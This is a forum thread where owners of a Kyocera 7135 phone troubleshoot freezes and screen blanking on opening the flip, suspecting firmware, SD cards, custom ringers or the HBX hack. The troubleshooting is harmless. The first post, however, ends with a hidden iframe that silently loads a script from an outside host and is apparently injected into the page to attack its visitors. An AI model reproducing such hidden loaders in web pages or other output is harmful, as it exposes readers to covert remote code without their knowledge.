+ Reply to Thread

Pause/Freeze on Opening Flip- Help?!

I am using an Alltel 7135 (original firmware/software MZ 1.0.27; SZ 1.0.13) on Verizon. I have had a *major* ongoing problem with intermittent freezes on opening the flip. Without the SD card, it's only for a second, but with the SD card (and using PiDirectII, with lots of apps on the card- this is essential for me), it may last around 15 seconds. It happens perhaps 20% of the time, and if it happens with an incoming call, the phone rings, but I can't answer it before it goes to voicemail. I have confirmed the short occasional freeze (1 second) even after a hard reset, with nothing installed. Of note, it ONLY happens if the phone is turned on- it never happens if the phone is off.

I had been hoping to see if a firmware upgrade would help, but alas, who knows when that will actually be available. So I finally gave in and just got an advance replacement from Kyocera. Unfortunately, it has the same old alltel firmware, and AGAIN, the same intermittent freeze problem. I can only assume I need to try upgraded firmware, but anyone else still experiencing this (I know this had been discussed some time ago). Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have the same firmware but don't get the problem (granted, I've only had the current unit for a week). On your second unit, did you re-sync all you old apps right away? It seems that certain things can permanently damage the firmware. Maybe you could list out your apps/hacks and see if anyone else is having problems using them.

KliuLess- are you using the phone with alltel or verizon. FYI, the short pause happened immediately, before even initially reinstalling anything.

I have the pause too, never as bad as 15sec though. My max pause is probably 7 seconds. I am using an original Alltel 7135 firmware. I do have a SD card in but not using PIDirect at all. Just have some backups, a few barely used apps, and some mp3s.

Wish we could figure this one out because it is annoying!!!

-GadgetPro

I have original Alltel firmware with 256Mb SD and no problems. Sounds like some app to me.

pdadoc, mine is an Alltel with the exact same firmware as yours. I also keep an SD card inserted most of the time, but w/o PIDirect.

When you say the pause happened immediately, you mean right when you opened the Kyo replacement shipment? If you installed software, then did a hard reset, that doesn't count, because there's a chance the sw might have done something permanent.

You said it only happens when the phone is on. Do you think it could be problems with reception? Gadget, are you also seeing the pause only when the phone is on?

I never have the phone side off so I am not able to tell if there is a pause with phone off too. I will try to do some testing and see.

-Kresten

I also have that problem but not every single time. After opening the phone the screen immediately goes blank and then reappears with parts of the screen blanked out. I have to press either home or end in order for it to refresh and appear again. It's kind of pain since you loose whatever application you had on at the time.

It seems like that the processor goes to sleep after a while and then when you open the flip it is slow to wake up and garbles the screen information.

I have a 256 MB SD card installed but no hacks or other background programs installed.

Here's a video that show how this happens.

Screen Partly Blanked out

Originally posted by PhilippZ
    Here's a video that show how this happens.

Screen Partly Blanked out
    Off topic, I know, but what launcher are you using on your 7135? I didn't recognize it. Also, I noticed you only have two options on your phone screen. I have six. Is this one of the differences between AllTel and Verizon phones? I'm with Verizon. Thanks for the video. I've never had that problem you demonstrate, and I'd be mad as hell if I did.

There were only 2 options because he just missed a call.

I have Verizon and am using Launcher III freeware.

Administrator
    wow! someone besides myself still using L III! ive had it for over two years and its great! if it aint broke,, dont fix it!

I had this problem this morning and missed a call because of it. It rang and I opened the flip and FREEZE. I hit SEND so many times to try to answer it it called ther person back after it unfroze (and I got busy signal).

I'm currently using a custom ringer, and am wondering if anyone who has this problem also uses a custom ringer. I've removed all custom sounds from my phone and will see if this temporarily fixes it. Hopefully the next firmware update will fix this issue.

Mostly Converged
    I noticed this problem when I installed the Demo version of HBX (Hardware Button Extender), when I disabled that hack, it did not do this, but with it enabled, I got longer than 15second blank screens. Try disabling all hacks and then opening the flip.

If you find out which hack/improvement seems to cause this, then you can either upgrade and hope to fix, or decide which is more important.

For me, I disabled HBX, and life is fine.

Scott

Well, the most annoying this is when the phone rings, I open it, place it to my ear, and said hello? Then BANG!!! The loud ringer is right next to my ear. (And I have it at the highest setting)